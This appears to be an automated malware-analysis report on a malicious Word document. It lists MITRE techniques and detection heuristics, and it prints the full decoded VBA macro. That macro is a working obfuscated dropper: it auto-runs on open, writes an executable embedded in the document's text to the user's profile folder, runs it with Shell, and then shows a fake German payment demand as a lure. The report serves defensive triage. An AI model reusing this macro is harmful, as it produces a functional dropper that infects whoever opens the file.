MALICIOUS
336
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
T1204.002 Malicious File
The sample contains VBA macros with an AutoOpen function, a common indicator of malicious documents. Heuristics indicate potential shell calls and the use of ScriptControl, suggesting the macro is designed to download and execute a second-stage payload. The document body explicitly instructs the user to enable content, a social engineering lure to bypass security measures.
Heuristics 14
-
MSScriptControl.ScriptControl — CVE-2015-0097 high CVE likely CVE_2015_0097_SCMSScriptControl.ScriptControl — CVE-2015-0097
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
CwFPrOxIbWkjI = Shell(IFHBYjwGMHhws) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set GwFRhAofDRtQ = GetObject(, "word.Application") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
ugkjfpNxNfTueAu = Environ("USERPROFILE") -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5280 bytes |
SHA-256: 68ebe53c3d3abcc2501f85d3df54d0d3509a30812d46000969e50748f9ae1fe8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{95715BBF-82DC-4F1F-85D7-5B5E51747641}{56CA9AC5-1E03-47CD-90AF-63808AF9BDFE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "NewMacros"
Sub sUtBtjQyGvqTA()
Dim hAKtYWIUykaFs As String
Dim NvRAxzKQ As Integer
Dim UfriOnyUmB As String
Dim fHebaZBZLz As Paragraph
Dim ugkjfpNxNfTueAu As String
Dim mqVoPeHg As Byte
Dim LsFYQA As Integer
Dim RfEWttiC As String
Dim CwFPrOxIbWkjI As Integer
Dim XPYQaWg As String
Dim TpTkgUKfPwqWR As Long
Dim BGoxOBCN As Boolean
Dim vvGoyOETthz As String
NGxMulHqdY = "."
vvGoyOETthz = "IUiKXOkteev"
UfriOnyUmB = "oYekTxHzWmk"
RfEWttiC = "exe"
hAKtYWIUykaFs = vvGoyOETthz + NGxMulHqdY + RfEWttiC
ugkjfpNxNfTueAu = Environ("USERPROFILE")
ChDrive (ugkjfpNxNfTueAu)
ChDir (ugkjfpNxNfTueAu)
LsFYQA = FreeFile()
ytYWGBmDuVMVs
Debug.Print ("After OnTime: " & Now)
Dim RmmeVDiizeHlel As String
Dim VeyXWQqKdsqDO As ScriptControl
Dim DDDXHmWQl As String
Dim XORXOii As String
Dim rwafSxyTuqtqvUp As Document
Dim AxrPuczPeRYqdjC As String
Set VeyXWQqKdsqDO = UserForm1.ScriptControl1
VeyXWQqKdsqDO.Language = "VBS" + "cript"
XORXOii = "ActiveDocument."
AxrPuczPeRYqdjC = "Paragraphs"
DDDXHmWQl = XORXOii + AxrPuczPeRYqdjC
Set GwFRhAofDRtQ = GetObject(, "word.Application")
On Error GoTo NYOpMdzVyjAJm
VeyXWQqKdsqDO.AddObject "Obj", GwFRhAofDRtQ
NYOpMdzVyjAJm:
For Each fHebaZBZLz In VeyXWQqKdsqDO.Eval("Obj." & DDDXHmWQl)
zUjrSlmUSf (fHebaZBZLz)
XPYQaWg = fHebaZBZLz.Range.Text
Debug.Print ("After OnTime: " & Now)
If (BGoxOBCN = True) Then
TpTkgUKfPwqWR = 1
Dim KTlskKWiwFE As Integer
KTlskKWiwFE = 4
While (TpTkgUKfPwqWR < Len(XPYQaWg))
mqVoPeHg = Mid(XPYQaWg, TpTkgUKfPwqWR, KTlskKWiwFE)
Debug.Print ("After OnTime: " & Now)
Put #LsFYQA, , mqVoPeHg
TpTkgUKfPwqWR = TpTkgUKfPwqWR + KTlskKWiwFE
Wend
ElseIf (InStr(1, XPYQaWg, UfriOnyUmB) > 0 And Len(XPYQaWg) > 0) Then
Dim RBxXhsGMJRp As Boolean
RBxXhsGMJRp = True
BGoxOBCN = RBxXhsGMJRp
End If
Next
Close #LsFYQA
ksLBeidGcRDiLh (hAKtYWIUykaFs)
End Sub
Sub Auto_Open()
sUtBtjQyGvqTA
End Sub
Sub fldtFcfax()
Word.ActiveDocument.Range.Select
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Dim yVlrHRtOdVSVNXO As Word.Document
Set yVlrHRtOdVSVNXO = ThisDocument
yVlrHRtOdVSVNXO.Range.InsertParagraphAfter
yVlrHRtOdVSVNXO.Range.InsertAfter "Datei Nr. : 51123944" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "Zu bezahlen: 575,82 EUR" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "Bezahlt: 0,00 EURRest: 575,82 EUR" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "Rente (Datei Nr. : 51123944" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "Zu bezahlen: 575,82 EUR" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "Bezahlt: 0,00 EURRest: 575,82 EUR" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "Rente (berechnet bis 28052014): 326,73 EUR" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "Kosten: 162,46 EURZu bezahlen (totale balans) 1 065,01 EUR" + vbLf
yVlrHRtOdVSVNXO.Range.InsertAfter "" + vbLf
End Sub
Sub zUjrSlmUSf(fuPhpssTB)
DoEvents
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub ytYWGBmDuVMVs()
Dim vvGoyOETthz As String
Dim LsFYQA As Integer
Dim hAKtYWIUykaFs As String
Dim RfEWttiC As String
Dim NGxMulHqdY As String
NGxMulHqdY = "."
RfEWttiC = "exe"
vvGoyOETthz = "IUiKXOkteev"
hAKtYWIUykaFs = vvGoyOETthz + NGxMulHqdY + RfEWttiC
LsFYQA = FreeFile()
Open hAKtYWIUykaFs For Binary As LsFYQA
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Sub ksLBeidGcRDiLh(IFHBYjwGMHhws As String)
Dim ugkjfpNxNfTueAu As String
Dim CwFPrOxIbWkjI As Integer
ugkjfpNxNfTueAu = Environ("USERPROFILE")
ChDrive (ugkjfpNxNfTueAu)
ChDir (ugkjfpNxNfTueAu)
Debug.Print ("After OnTime: " & Now)
CwFPrOxIbWkjI = Shell(IFHBYjwGMHhws)
fldtFcfax
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.